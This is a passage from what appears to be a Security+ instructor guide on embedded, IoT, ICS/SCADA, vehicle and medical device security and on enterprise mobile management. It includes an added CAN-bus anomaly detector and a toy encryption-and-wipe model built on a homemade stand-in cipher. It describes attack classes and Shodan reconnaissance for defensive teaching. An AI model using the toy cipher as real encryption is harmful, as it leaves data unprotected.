application-layer encryption for additional security.

Z-Wave and Zigbee

Z-Wave and Zigbee are wireless communications protocols used primarily for home
automation. Both create a mesh network topology, using low-energy radio waves to
communicate from one appliance to another. In Z-Wave, devices can be configured to
work as repeaters to extend the network but there is a limit of four hops between a
controller device and an endpoint. Z-Wave uses frequencies in the sub-GHz (MHz) range.
Zigbee has similar uses to Z-Wave and is an open source competitor technology to it.
The Zigbee Alliance operates certification programs for its various technologies and
standards. Zigbee uses the 2.4 GHz frequency band. This higher frequency allows more
data bandwidth at the expense of range compared to Z-Wave and the greater risk of
interference from other 2.4 GHz radio communications. Zigbee supports more overall
devices within a single network and there is no hop limit for communication between
devices.
Both Z-Wave and Zigbee have communications encryption. The main threats are from
re-pairing attacks and from rogue devices. A re-pairing attack allows a threat actor
to discover the network key by forcing a device off the network, causing it to try to
re-connect (checkpoint.com/press/the-dark-side-of-smart-lighting-check-point-
research-shows-how-business-and-home-networks-can-be-hacked-from-a-lightbulb). If
the user connects a rogue device to the network, the system depends on application-
level security to prevent the device from compromising higher value targets, such as a
smart hub, alarm, or door entry mechanism.

Industrial Control Systems

Show Slide(s): Industrial Control Systems
Teaching Tip: Explain the main components in ICS/SCADA, then discuss some general
risks for each industry sector. Remind students that they can visit the sector-specific
ISACs for more information.

Industrial systems have different priorities to IT systems. Often, hazardous
electromechanical components are involved, so safety is the overriding priority.
Industrial processes also prioritize availability and integrity over confidentiality,
reversing the CIA triad as the AIC triad.

Workflow and Process Automation Systems

Industrial control systems (ICSs) provide mechanisms for workflow and process
automation. These systems control machinery used in critical infrastructure, like
power suppliers, water suppliers, health services, telecommunications, and national
security services. An ICS that manages process automation within a single site is usually
referred to as a distributed control system (DCS).

An ICS comprises plant devices and equipment with embedded PLCs. The PLCs are
linked either by an OT fieldbus serial network or by industrial Ethernet to actuators
that operate valves, motors, circuit breakers, and other mechanical components, plus
sensors that monitor some local state, such as temperature. Output and configuration
of a PLC is performed by one or more human-machine interfaces (HMIs). An HMI
might be a local control panel or software running on a computing host. PLCs are
connected within a control loop, and the whole process automation system can be
governed by a control server. Another important concept is the data historian, which
is a database of all the information generated by the control loop.

Supervisory Control and Data Acquisition (SCADA)

A supervisory control and data acquisition (SCADA) system takes the place of
a control server in large-scale, multiple-site ICSs. SCADA typically run as software
on ordinary computers, gathering data from and managing plant devices and
equipment with embedded PLCs, referred to as field devices. SCADA typically use WAN
communications, such as cellular or satellite, to link the SCADA server to field devices.

ICS/SCADA Applications
These types of systems are used within many sectors of industry:

• Energy refers to power generation and distribution. More widely, utilities includes
water/sewage and transportation networks.

• Industrial can refer specifically to the process of mining and refining raw materials,
involving hazardous high heat and pressure furnaces, presses, centrifuges, pumps,
and so on.

• Fabrication and manufacturing refer to creating components and assembling
them into products. Embedded systems are used to control automated production
systems, such as forges, mills, and assembly lines. These systems must work to
extremely high precisions.

• Logistics refers to moving things from where they were made or assembled to
where they need to be, either within a factory or for distribution to customers.
Embedded technology is used in control of automated transport and lift systems
plus sensors for component tracking.

• Facilities refers to site and building management systems, typically operating
automated heating, ventilation, and air conditioning (HVAC), lighting, and security
systems.

ICS/SCADA was historically built without regard to IT security, though there is now high
awareness of the necessity of enforcing security controls to protect them, especially
when they operate in a networked environment.

One infamous example of an attack on an embedded system is the Stuxnet worm (wired.
com/2014/11/countdown-to-zero-day-stuxnet). This was designed to attack the SCADA
management software running on Windows PCs to damage the centrifuges used by Iran's
nuclear fuels program. NIST Special Publication 800-82 covers some recommendations
for implementing security controls for ICS and SCADA (nvlpubs.nist.gov/nistpubs/
SpecialPublications/NIST.SP.800-82r2.pdf).

Internet of Things

Show Slide(s): Internet of Things
Teaching Tip: With Internet of Things and wearable technology, evaluation of the supply
chain is critical. Vendors and OEMs must be assessed for their security awareness.

The term Internet of Things (IoT) is used to describe a global network of appliances
and personal devices that have been equipped with sensors, software, and network
connectivity. This compute functionality allows these objects to communicate and
pass data between themselves and other traditional systems like computer servers.
This is often referred to as Machine to Machine (M2M) communication. Each thing is
identified with some form of unique serial number or code embedded within its own
operating or control system and is able to inter-operate within the existing Internet
infrastructure either directly or via an intermediary. An IoT network will generally use
the following types of components:

• Hub/control system: IoT devices usually require a communications hub to facilitate
Z-Wave or Zigbee networking. There must also be a control system, as most IoT
devices are headless, meaning they have no user control interface. This could be a
smart hub, with voice control, or a smartphone/PC app.

• Smart devices: IoT endpoints implement the function, such as a smart lightbulb
or a video entryphone that you can operate remotely. These devices implement
compute, storage, and network functions that are all potentially vulnerable to
exploits. Most smart devices use a Linux or Android kernel. Because they're
effectively running mini-computers, smart devices are vulnerable to some of
the standard attacks associated with web applications and network functions.
Integrated peripherals such as cameras or microphones could be compromised to
facilitate surveillance.

• Wearables: some IoT devices are designed as personal accessories, such as
smart watches, bracelets and pendant fitness monitors, and eyeglasses. Current
competing technologies are based on FitBit, Android Wear OS, Samsung's Tizen OS,
and Apple iOS, each with their own separate app ecosystems.

• Sensors: IoT devices need to measure all kinds of things, including temperature,
light levels, humidity, pressure, proximity, motion, gas/chemicals/smoke, heart/
breathing rates, and so on. These are implemented as thermocouples/thermistors,
infrared detectors, inductive, photoelectric, and capacitative cells, accelerometers,
gyroscopes, and more.

Home automation products often use vendor-specific software and networking
protocols. As with embedded devices, security features can be poorly documented, and
patch management/security response processes of vendors can be inadequate. When
they are designed for residential use, IoT devices can suffer from weak defaults. They
may be configured to work with a minimum of configuration effort. There may be
recommended steps to secure the device that the customer never takes.

Specialized Systems for Facility Automation

Show Slide(s): Specialized Systems for Facility Automation

A specialized system refers to the use of embedded systems and/or IoT devices for a
specific purpose or application.

Building Automation System (BAS)

A building automation system (BAS) for offices and data centers ("smart buildings")
can include physical access control systems, but also heating, ventilation, and air
conditioning (HVAC), fire control, power and lighting, and elevators and escalators.
These subsystems are implemented by PLCs and various types of sensors that
measure temperature, air pressure, humidity, room occupancy, and so on. Some
typical vulnerabilities that affect these systems include:

• Process and memory vulnerabilities, such as buffer overflow, in the PLCs. These may
arise from processing maliciously crafted packets in the automation management
protocol. Building automation uses dedicated network protocols, such as BACnet or
Dynet.

• Use of plaintext credentials or cryptographic keys within application code.

• Code injection via the graphical web application interfaces used to configure and
monitor systems. This can be used to perform JavaScript-based attacks, such as
clickjacking and cross-site scripting (XSS).

It is possible that control of these systems could be used to perform some sort of
DoS or ransom demand (consider disrupting HVAC controls within a data center, for
instance). However, as with the Target data breach, the aim is likely to access the
corporate data network from the automation and monitoring system, which may be
accessible via a supplier company (krebsonsecurity.com/tag/fazio-mechanical).

Smart Meters
A smart meter provides continually updating reports of electricity, gas, or water usage
to the supplier, reducing the need for manual inspections. Most meters use cellular
data for communication back to the supplier, and an IoT protocol, such as Zigbee, for
integration with smart appliances.

Surveillance Systems
A physical access control system (PACS) is a network of monitored locks, intruder
alarms, and video surveillance. A PACS can either be implemented as part of a building
automation system or a separate system in its own right. Gaining physical access to
premises, or even just access to video monitoring systems, gives an adversary many
opportunities to develop additional attacks. As with building automation, a PACS is likely to
be installed and maintained by an external supplier. This can lead to it being omitted from
risk and vulnerability assessments, as highlighted by the Government Accountability
Office's report into PACS at federal offices (gao.gov/assets/….pdf).
Physical security systems use networked camera systems (CCTV) for surveillance.
Unfortunately, some makes of camera systems have been found to have numerous
serious vulnerabilities that allow attackers either to prevent intrusions from being
recorded or to hijack the cameras to perform their own surveillance. These issues
tend to affect cheap consumer-grade systems rather than enterprise models, but in
both cases it is necessary to evaluate the supplier to demonstrate that their security
monitoring and remediation support services are effective.

Specialized Systems in IT

Show Slide(s): Specialized Systems in IT
Teaching Tip: In 2014, security researchers hacked the web interface of a Canon Pixma
printer and used the exploit to install the '90s first-person shooter game Doom on the
printer firmware (wired.com/doom-printer).

There are also specialized systems installed within office networks, such as printer and
Voice over IP (VoIP) equipment. These systems must not be overlooked by security
monitoring procedures.

Multifunction Printers (MFPs)

Most modern print devices, scanners, and fax machines have hard drives and
sophisticated firmware, allowing their use without attachment to a computer and
over a network. Often these print/scan/fax functions are performed by single devices,
referred to as multifunction printers (MFPs). Unless they have been securely deleted,
images and documents are frequently recoverable from all of these machines. Some of
the more feature-rich, networked printers and MFPs can also be used as a pivot point
to attack the rest of the network. These machines also have their own firmware that
must be kept patched and updated.

Voice over IP (VoIP)
Types of embedded systems are used to implement both Voice over IP (VoIP) endpoints
and media gateways. Endpoints can be individual handsets or conferencing units.
A media gateway might use a separate firmware to implement integration with
telephone and cellular networks.

Where these devices connect directly to the Internet, a fingerprinting app or website
(shodan.io/explore/tag/voip or shodan.io/explore/tag/printer, for instance) can be used to
probe for unpatched vulnerabilities. There are Shodan queries for any number of IoT and
ICS devices.

Shodan search results for sites responding to probes over port 9100 (TCP port for raw print data).


Specialized Systems for Vehicles and Drones

Show Slide(s): Specialized Systems for Vehicles and Drones

Automobiles and unmanned aerial vehicles (UAV), or drones, contain sophisticated
electronics to control engine and power systems, braking and landing, and suspension/
stability. Modern vehicles are increasingly likely to have navigation and entertainment
systems, plus driver-assist or even driverless features, where the vehicle's automated
systems can take control of steering and braking. The locking, alarm, and engine
immobilizer mechanisms are also likely to be part of the same system. Each of these
subsystems is implemented as an electronic control unit (ECU), connected via one
or more controller area network (CAN) serial communications buses. The principal
external interface is an Onboard Diagnostics (OBD-II) module. The OBD-II also acts as a
gateway for multiple CAN buses.
The CAN bus operates in a somewhat similar manner to shared Ethernet and was
designed with just as little security. ECUs transmit messages as broadcast so they
are received by all other ECUs on the same bus. There is no concept of source
addressing or message authentication. An attacker able to attach a malicious device
to the OBD-II port is able to perform DoS attacks against the CAN bus, threatening
the safety of the vehicle. There are also remote means of accessing the CAN bus,
such as via the cellular features of the automobile's navigation and entertainment
system (wired.com/hackers-remotely-kill-jeep-highway). Some vehicles also
implement on-board Wi-Fi, further broadening the attack surface.
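Because CAN frames carry no source address or authentication, a receiving ECU cannot tell an injected frame from a legitimate one; what a defender can observe is bus timing. The following is an added example, not from the course or any vendor, that learns each arbitration ID's normal message period from a clean capture and then flags unknown IDs and off-schedule frames (the symptoms of flooding or spoofing). The candump-style log format and the sample frames are constructed for the demo.

```python
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean


@dataclass(frozen=True)
class CanFrame:
    ts: float        # capture timestamp in seconds
    arb_id: int      # 11-bit arbitration ID; a lower value wins bus arbitration
    data: bytes      # 0 to 8 bytes of payload


def parse_candump(lines):
    """Parse '(ts) iface ID#HEXDATA' lines (constructed, candump-like format)."""
    frames = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ts_part, _iface, payload = line.split()
        arb_hex, data_hex = payload.split("#")
        frames.append(CanFrame(float(ts_part.strip("()")), int(arb_hex, 16),
                               bytes.fromhex(data_hex)))
    return frames


class CanAnomalyDetector:
    """Baseline the set of IDs and their mean inter-arrival time from a clean
    capture, then report frames the bus itself has no way to reject."""

    def __init__(self, rate_factor=4.0):
        self.known = set()       # arbitration IDs seen during learning
        self.period = {}         # arb_id -> mean inter-arrival interval (s)
        self.rate_factor = rate_factor

    def learn(self, frames):
        last, gaps = {}, defaultdict(list)
        for f in sorted(frames, key=lambda x: x.ts):
            if f.arb_id in last:
                gaps[f.arb_id].append(f.ts - last[f.arb_id])
            last[f.arb_id] = f.ts
        self.known = set(last)
        self.period = {i: mean(g) for i, g in gaps.items()}

    def detect(self, frames):
        """Return (ts, kind, arb_id) alerts for unknown IDs and for frames that
        arrive much faster than the learned period for their ID."""
        alerts, last = [], {}
        for f in sorted(frames, key=lambda x: x.ts):
            if f.arb_id not in self.known:
                alerts.append((f.ts, "unknown-id", f.arb_id))
            elif f.arb_id in self.period and f.arb_id in last:
                if f.ts - last[f.arb_id] < self.period[f.arb_id] / self.rate_factor:
                    alerts.append((f.ts, "rate-anomaly", f.arb_id))
            last[f.arb_id] = f.ts
        return alerts


def sample_capture(flood=False):
    """Constructed capture: two periodic ECUs (10 ms and 20 ms); with
    flood=True, add a burst on an unseen high-priority ID plus one spoofed
    frame on the engine ID sent off its schedule."""
    lines = []
    for k in range(20):
        lines.append(f"({k * 0.010:.3f}) can0 0C0#1A2B")
        if k % 2 == 0:
            lines.append(f"({k * 0.010:.3f}) can0 1A0#00")
    if flood:
        for k in range(5):
            lines.append(f"({0.100 + k * 0.001:.3f}) can0 000#FF")
        lines.append("(0.101) can0 0C0#1A2B")
    return lines


if __name__ == "__main__":
    det = CanAnomalyDetector()
    det.learn(parse_candump(sample_capture()))
    for alert in det.detect(parse_candump(sample_capture(flood=True))):
        print(alert)
```
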

Specialized Systems for Medical Devices

Show Slide(s): Specialized Systems for Medical Devices
Teaching Tip: You can reference the recall of certain types of pacemaker (csoonline.com/
article/abbott-pacemakers-vulnerable-to-hacking-need-a-firmware-fix.html) for a firmware
update to fix a vulnerability that could allow an attacker to drain the device's battery.

Medical devices represent an array of systems potentially vulnerable to a wide range
of attacks. It is important to recognize that use of these devices is not confined
to hospitals and clinics but includes portable devices such as cardiac monitors/
defibrillators and insulin pumps. As well as unsecure communication protocols, many
of the control systems for these devices run on unsupported versions of operating
systems (such as Windows XP) because the costs of updating the software to work
with newer versions is high and disruptive to patient services. Some of the goals of
attacks on medical devices and services are as follows:

• Use compromised devices to pivot to networks storing medical data with the aim of
stealing protected health information (PHI).

• Hold medical units ransom by threatening to disrupt services.

• Kill or injure patients (or threaten to do so) by tampering with dosage levels or
device settings.

Show Slide(s): Security for Embedded Systems

Security for Embedded Systems

Embedded systems must not be overlooked when designing the security system. The following methods can be used to mitigate risk in such environments.

Teaching Tip: There should be a management plan for securing and updating embedded devices. Control systems for embedded systems should generally be separated from the corporate data network, perhaps using VLANs and firewalls.

Network Segmentation

Network segmentation is one of the core principles of network security. Network access for static environments should only be required for applying firmware updates and management controls from the host software to the devices and for reporting status and diagnostic information from the devices back to the host software. This control network should be separated from the corporate network using firewalls and VLANs.

With environments such as SCADA, the management software may require legacy versions of operating systems, making the hosts particularly difficult to secure. Isolating these hosts from others through network segmentation and using endpoint security (preventing the attachment of devices) can help to ensure they do not become infected with malware or exposed to network exploits.


Wrappers

One way of increasing the security of data in transit for embedded systems is through the use of wrappers, such as IPSec. The only thing visible to an attacker or anyone sniffing the wire is the IPSec header, which describes only the tunnel endpoints. This is useful for protecting traffic between trusted networks when the traffic has to go through an untrusted network to go between them, or between trusted nodes on the same network.

Firmware Code Control and Inability to Patch

Embedded systems demonstrate one of the reasons that supply chain risks must be carefully managed. Programming logic implemented in FPGA and firmware code must not contain backdoors. Firmware patching is just as vital as keeping host software up to date, but for many embedded systems, it is far more of a challenge:

• Many embedded systems and IoT devices use low-cost firmware chips and the vendor never produces updates to fix security problems or only produces updates for a relatively short product cycle (while the device could remain in operational use for much longer).

• Many embedded systems require manual updates, which are perceived as too time-consuming for a security department with other priorities to perform.

• Availability is a key attribute for most embedded deployments. Patching without service interruption may not be possible, and opportunities for downtime servicing extremely limited.

Cisco Live presents a useful overview of embedded system security requirements (ciscolive.com c dam r ciscolive us docs 01 pdf IOT- 11 .pdf).


Review Activity:
Embedded System Security Implications

Answer the following questions:

1. Other than cost, which factor primarily constrains embedded systems in terms of compute and networking?

Power: many embedded systems must operate on battery power, and changing the batteries is an onerous task, so power-hungry systems like processing and high bandwidth or long-range networking are constrained.

2. True or false? While fully customizable by the customer, embedded systems are based on either the Raspberry Pi or the Arduino design.

False: these are examples of one-board computers based on the system on chip (SoC) design. They are widely used in education and leisure. Some are used for industrial applications or for proof-of-concept designs, but most embedded systems are manufactured to specific requirements.

3. What addressing component must be installed or configured for IoT?

An LTE-based cellular radio, such as narrowband-IoT, uses a subscriber identity module (SIM) card as an identifier. This can either be installed as a plug-in card or configured as an eSIM chip on the system board or feature in a SoC design.

4. You are assisting with the preparation of security briefings on embedded systems tailored to specific implementations of embedded systems. Following the CompTIA Security+ syllabus, you have created the industry-specific advice for the following sectors. Which one do you have left to do?

Facilities, Industrial, Manufacturing, Energy

Logistics: transportation of components for assembly or distribution of finished products.

5. Why should detailed vendor and product assessments be required before allowing the use of IoT devices in the enterprise?

As systems with considerable computing and networking functionality, these devices are subject to the same sort of vulnerabilities and exploits as ordinary workstations and laptops. It is critical to assess the vendor's policies in terms of the security design for the product and support for identifying and mitigating any vulnerabilities discovered in its use.


Lesson 12
Summary

You should be able to apply host hardening policies and technologies and to assess risks from third-party supply chains and embedded/IoT systems.

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, re-visit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.

Guidelines for Implementing Host Security Solutions

Follow these guidelines when you deploy or re-assess endpoint security and integration with embedded or IoT systems:

• Assess third-party risks and ensure that appropriate procedures and agreements (MOU, NDA, SLA, BPA, MSA) are used to onboard approved vendors and partners as technology and solutions providers.

• Establish configuration baselines for each host type. Ensure that hosts are deployed to the configuration baseline and set up monitoring to ensure compliance.

• Configure secure boot options and consider the use of attestation and policy servers as the basis of a network access control mechanism.

• Configure storage encryption using full disk or self-encrypting drives.

• Deploy an endpoint protection solution that meets security requirements for functions such as anti-malware, firewall, IDS, EDR, and DLP.

• Establish patch management procedures to test updates for different host groups and ensure management of both OS and third-party software.

• Create a management plan for any IoT devices used in the workplace and ensure there is no shadow IT deployment of unmanaged appliances.

• Assess security requirements for ICS and/or SCADA embedded systems:

  Procurement of secure SoC, RTOS, and FPGA controller systems.

  Use of cryptographic controls for authentication, integrity, and resiliency.

  Use of specialist communications technologies.

  Access control and segmentation for OT networks.

  Vendor support for patch management.

Interaction Opportunity: Optionally, ask students if they have experience of either ICS/SCADA systems or PACS. Ask if IoT devices are present in their workplace, and whether there is a management plan for them.

Lesson 13
Implementing Secure Mobile Solutions

LESSON INTRODUCTION

Mobile devices are now the preferred client for many common work tasks, and network management and security systems have had to adapt to accommodate them. The shift toward mobile also presages a move toward unified management of endpoints, and the use of virtualized workspaces as a better model for provisioning corporate apps and data processing.

Teaching Tip: This lesson follows on from host security by looking specifically at mobile devices. While there are a lot of content examples to cover, this subject area is well-established at A+ level, so you may be able to move quite quickly through this section.

Lesson Objectives

In this lesson, you will:

• Implement mobile device management.

• Implement secure mobile device connections.


Topic 13A
Implement Mobile Device Management

EXAM OBJECTIVES COVERED
3.5 Given a scenario, implement secure mobile solutions

Teaching Tip: This is another topic where lab support is difficult. If you have a corporate MDM or EMM solution that you can show to the students as a demo, that would help. Otherwise, students should refer to vendor implementation guides.

As use of mobiles has permeated every type of organization, network management and security suites have developed to ensure that they are not exploited as unmanaged attack vectors. As a security professional, you will often have to configure these management suites, and assist users with the device onboarding process.

Show Slide(s): Mobile Device Deployment Models

Mobile Device Deployment Models

Mobile devices have replaced computers for many email and diary management tasks and are integral to accessing many other business processes and cloud-based applications. A mobile device deployment model describes the way employees are provided with mobile devices and applications.

• Bring your own device (BYOD)—the mobile device is owned by the employee. The mobile will have to meet whatever profile is required by the company (in terms of OS version and functionality) and the employee will have to agree on the installation of corporate apps and to some level of oversight and auditing. This model is usually the most popular with employees but poses the most difficulties for security and network managers.

• Corporate owned, business only (COBO)—the device is the property of the company and may only be used for company business.

• Corporate owned, personally-enabled (COPE)—the device is chosen and supplied by the company and remains its property. The employee may use it to access personal email and social media accounts and for personal web browsing (subject to whatever acceptable use policies are in force).

• Choose your own device (CYOD)—much the same as COPE but the employee is given a choice of device from a list.

Virtualization can provide an additional deployment model. Virtual desktop infrastructure (VDI) means provisioning an OS desktop to interchangeable hardware. The hardware only has to be capable of running a VDI client viewer, or have browser support for a clientless HTML5 solution. The instance is provided "as new" for each session and can be accessed remotely. The same technology can be accessed via a mobile device such as a smartphone or tablet. This removes some of the security concerns about BYOD as the corporate apps and data are segmented from the other apps on the device.


Show Slide(s): Enterprise Mobility Management

Enterprise Mobility Management

Enterprise mobility management (EMM) is a class of management software designed to apply security policies to the use of mobile devices and apps in the enterprise. The challenge of identifying and managing attached devices is often referred to as visibility. EMM software can be used to manage enterprise-owned devices as well as BYOD. There are two main functions of an EMM product suite:

• Mobile device management (MDM)—sets device policies for authentication, feature use (camera and microphone), and connectivity. MDM can also allow device resets and remote wipes.

• Mobile application management (MAM)—sets policies for apps that can process corporate data, and prevents data transfer to personal apps. This type of solution configures an enterprise-managed container or workspace.

Teaching Tip: At this point, MDM and MAM are probably best thought of as functionality within products, rather than product classes. Note the trend toward unified endpoint management, including IoT devices.

Additionally, distinguishing whether client endpoints are mobile or fixed is not really a critical factor for many of these management tasks, with the consequence that the latest suites aim for visibility across PC, laptop, smartphone, tablet, and even IoT devices. These suites are called unified endpoint management (UEM) (redmondmag.com article: Unified Endpoint Management).

The core functionality of endpoint management suites extends the concept of network access control (NAC) solutions. The management software logs the use of a device on the network and determines whether to allow it to connect or not, based on administrator-set parameters. When the device is enrolled with the management software, it can be configured with policies to allow or restrict use of apps, corporate data, and built-in functions, such as a video camera or microphone.

Interaction Opportunity: Encourage students to browse the vendor sites referenced in the text to get a better idea of the features and capabilities of EMM/UEM suites.

Some EMM/UEM solutions include AirWatch (air-watch.com), Microsoft Intune (microsoft.com/en-us/microsoft-365/enterprise-mobility-security/microsoft-intune), Symantec/Broadcom (broadcom.com/products/cyber-security/endpoint/end-user/protection-mobile), and Citrix Endpoint Management (formerly XenMobile) (citrix.com/products/citrix-endpoint-management).

Show Slide(s): iOS in the Enterprise

iOS in the Enterprise

In Apple's iOS ecosystem, third-party developers can create apps using Apple's Software Development Kit, available only on macOS. Apps have to be submitted to and approved by Apple before they are released to users via the App Store. Corporate control over iOS devices and distribution of corporate and business-to-business apps is facilitated by participating in the Device Enrollment Program (support.apple.com/business), the Volume Purchase Program, and the Developer Enterprise Program (developer.apple.com/programs/enterprise). Another option is to use an EMM suite and its development tools to create a "wrapper" for the corporate app.

Teaching Tip: Remind students of the importance of keeping developer accounts secure.


Configuring iOS device enrollment in Microsoft's Intune EMM suite. (Screenshot used with permission from Microsoft.)

Most iOS attacks are the same as with any system; users click malicious links or enter
information into phishing sites, for instance. As a closed and proprietary system, it
should not be possible for malware to infect an iOS device as all code is updated from
Apple's servers only. There remains the risk that a vulnerability in either iOS or an app
could be discovered and exploited. In this event, users would need to update iOS or the
app to a version that mitigates the exploit.

Show Slide(s): Android in the Enterprise

Android in the Enterprise

Android's open source basis means that there is more scope for vendor-specific versions. The app model is also more relaxed, with apps available from both Google Play and third-party sites, such as Amazon's app store. The SDK is available on Linux, Windows, and macOS. The Android Enterprise (android.com/enterprise) program facilitates use of EMM suites and the containerization of corporate workspaces. Additionally, Samsung has a workspace framework called KNOX (samsung.com/us/business/solutions/samsung-knox) to facilitate EMM control over device functionality.


Enrolling an Android smartphone with Intune. (Android is a trademark of Google LLC.)

iOS devices are normally updated very quickly. With Android, the situation is less consistent, as updates often depend on the handset vendor to complete the new version or issue the patch for their flavor of Android. Android is more open and there is Android malware, though as with Apple it is difficult for would-be hackers and spammers to get it into any of the major app repositories.

One technique used is called Staged Payloads. The malware writers release an app that appears innocuous in the store but once installed it attempts to download additional components infected with malware (zdnet.com/article/android-security-sneaky-three-stage-malware-found-in-google-play-store). Google has implemented a server-side malware scanning product (Play Protect) that will both warn users if an app is potentially damaging and scan apps that have already been purchased, and warn the user if any security issues have been discovered.

Since version 4.3, Android has been based on Security-Enhanced Linux. SEAndroid (source.android.com/security/selinux) uses mandatory access control (MAC) policies to run apps in sandboxes. When the app is installed, access is granted or not to specific shared features, such as contact details, SMS texting, and email.


Configuring app permissions in Android OS. (Android is a trademark of Google LLC.)

Show Slide(s): Mobile Access Control Systems

Mobile Access Control Systems

If a threat actor is able to gain access to a smartphone or tablet, they can obtain a huge amount of information and the tools with which to launch further attacks. Quite apart from confidential data files that might be stored on the device, it is highly likely that the user has cached passwords for services such as email or remote access VPN and websites.

Teaching Tip: For students who have taken A+, this subject matter should be familiar. Just note the way that EMM can be used to enforce authentication types.

Smartphone Authentication

The majority of smartphones and tablets are single-user devices. Access control can be implemented by configuring a screen lock that can only be bypassed using the correct password, PIN, or swipe pattern. Many devices now support biometric authentication, usually as a fingerprint reader but sometimes using facial or voice recognition.

Configuring authentication and profile policies using Intune EMM. Note that the policy allows the user to have a different type of authentication (or none at all) to the workspace hosting corporate apps and data. (Screenshot used with permission from Microsoft.)


Strong passwords should always be set on mobile devices, as simple 4-digit PIN codes can easily be brute-forced. Swipe patterns are vulnerable to poor user choices (arstechnica.com/information-technology/2015/08/new-data-uncovers-the-surprising-predictability-of-android-lock-patterns), such as choosing letter or box patterns, plus the tendency for the grease trail to facilitate a smudge attack.

Screen Lock

The screen lock can also be configured with a lockout policy. This means that if an incorrect passcode is entered, the device locks for a set period. This could be configured to escalate (so the first incorrect attempt locks the device for a matter of seconds while the third locks it for 10 minutes, for instance). This deters attempts to guess the passcode.

Context-Aware Authentication

It is also important to consider newer authentication models, such as context-aware authentication. For example, smartphones now allow users to disable screen locks when the device detects that it is in a trusted location, such as the home. Conversely, an enterprise may seek more stringent access controls to prevent misuse of a device. For example, even if the device has been unlocked, accessing a corporate workspace might require the user to authenticate again. It might also check whether the network connection can be trusted (that it is not an open Wi-Fi hotspot, for instance).

Show Slide(s): Remote Wipe

Remote Wipe

A remote wipe or kill switch means that if the handset is stolen it can be set to the factory defaults or cleared of any personal data (sanitization). Some utilities may also be able to wipe any plug-in memory cards too. The remote wipe could be triggered by several incorrect passcode attempts or by enterprise management software. Other features include backing up data from the phone to a server first and displaying a "lost/stolen phone, please return to" message on the handset.

Most corporate messaging systems come with a remote wipe feature (such as this one provided with Intermedia mail hosting), allowing mail, calendar, and contacts information to be deleted from mobile devices. (Screenshot used with permission from Intermedia.)


In theory, a thief can prevent a remote wipe by ensuring the phone cannot connect to
the network, then hacking the phone and disabling the security.

Show Slide(s): Full Device Encryption and External Media

Full Device Encryption and External Media

All but the early versions of mobile device OSes for smartphones and tablets provide full device encryption. In iOS, there are various levels of encryption.

• All user data on the device is always encrypted but the key is stored on the device. This is primarily used as a means of wiping the device. The OS just needs to delete the key to make the data inaccessible rather than wiping each storage location.

• Email data and any apps using the Data Protection option are subject to a second round of encryption using a key derived from and protected by the user's credential. This provides security for data in the event that the device is stolen. Not all user data is encrypted using the Data Protection option; contacts, SMS messages, and pictures are not, for example.

Teaching Tip: Note that full disk encryption makes a handset less usable as a phone, so encryption is applied to user data areas rather than the whole device.

In iOS, Data Protection encryption is enabled automatically when you configure a password lock on the device. In Android, there are substantial differences to encryption options between versions (source.android.com/security/encryption). As of Android 10, there is no full disk encryption as it is considered too detrimental to performance. User data is encrypted at file level by default.
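An added illustration (not Apple's implementation or the guide's code) of the key hierarchy just described: every object is encrypted under a key held only on the device, objects in the Data Protection class are wrapped a second time under a key derived from the passcode, and a wipe is carried out by erasing the device key rather than overwriting storage. The HMAC-based stream cipher, the PBKDF2 derivation, and the file names are stand-ins assumed for this example so that it runs on the Python standard library.

```python
import hashlib
import hmac
import secrets

def _keystream_xor(key, nonce, data):
    """Toy XOR stream built from HMAC-SHA256(key, nonce || counter) blocks.
    Stand-in for the AES mode a real device uses; assumption of this example."""
    out = bytearray()
    for block in range((len(data) + 31) // 32):
        ks = hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[block * 32:(block + 1) * 32], ks))
    return bytes(out)

def encrypt(key, plaintext):
    """Return nonce || ciphertext || tag; the tag authenticates nonce and ciphertext."""
    nonce = secrets.token_bytes(16)
    ct = _keystream_xor(key, nonce, plaintext)
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def decrypt(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("auth-failed")  # wrong key (e.g. wrong passcode) or tampering
    return _keystream_xor(key, nonce, ct)

class DeviceStorage:
    """Flash storage with a device-bound key and an optional Data Protection layer."""
    def __init__(self):
        self.device_key = secrets.token_bytes(32)  # held only on the device
        self.salt = secrets.token_bytes(16)
        self.files = {}  # name -> (data_protection, blob)

    def _credential_key(self, passcode):
        # Slow derivation, entangled with the device key so it cannot be computed off-device.
        return hashlib.pbkdf2_hmac("sha256", passcode.encode(), self.salt + self.device_key, 100_000)

    def write(self, name, data, passcode=None):
        """Without a passcode the object gets the device-key layer only; with one it is
        in the Data Protection class and is first wrapped under the credential key."""
        if passcode is not None:
            data = encrypt(self._credential_key(passcode), data)
        self.files[name] = (passcode is not None, encrypt(self.device_key, data))

    def read(self, name, passcode=None):
        if self.device_key is None:
            raise PermissionError("wiped")
        protected, blob = self.files[name]
        data = decrypt(self.device_key, blob)
        if protected:
            if passcode is None:
                raise PermissionError("credential-required")
            data = decrypt(self._credential_key(passcode), data)
        return data

    def wipe(self):
        """Remote wipe as the text describes it: erase the key, not every storage block."""
        self.device_key = None

def try_read(storage, name, passcode=None):
    """Return ('ok', data) or ('error', reason) so callers can see why access failed."""
    try:
        return "ok", storage.read(name, passcode)
    except (PermissionError, ValueError) as exc:
        return "error", str(exc)

if __name__ == "__main__":
    dev = DeviceStorage()
    dev.write("photo.jpg", b"pixels")                    # constructed sample data
    dev.write("mail.db", b"inbox", passcode="482913")    # Data Protection class
    print(try_read(dev, "mail.db"), try_read(dev, "mail.db", "482913"))
    dev.wipe()
    print(try_read(dev, "photo.jpg"))
```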
A mobile device contains a solid state flash memory drive for persistent storage of apps and data. Some Android handsets support removable storage using external media, such as a plug-in Micro SecureDigital (SD) card slot; some may support the connection of USB-based storage devices. The mobile OS encryption software might allow encryption of the removable storage too but this is not always the case. Care should be taken to apply encryption to storage cards using third-party software if necessary and to limit sensitive data being stored on them.

A MicroSD HSM is a small form factor hardware security module designed to store cryptographic keys securely. This allows the cryptographic material to be used with different devices, such as a laptop and smartphone.

Show Slide(s): Location Services

Location Services

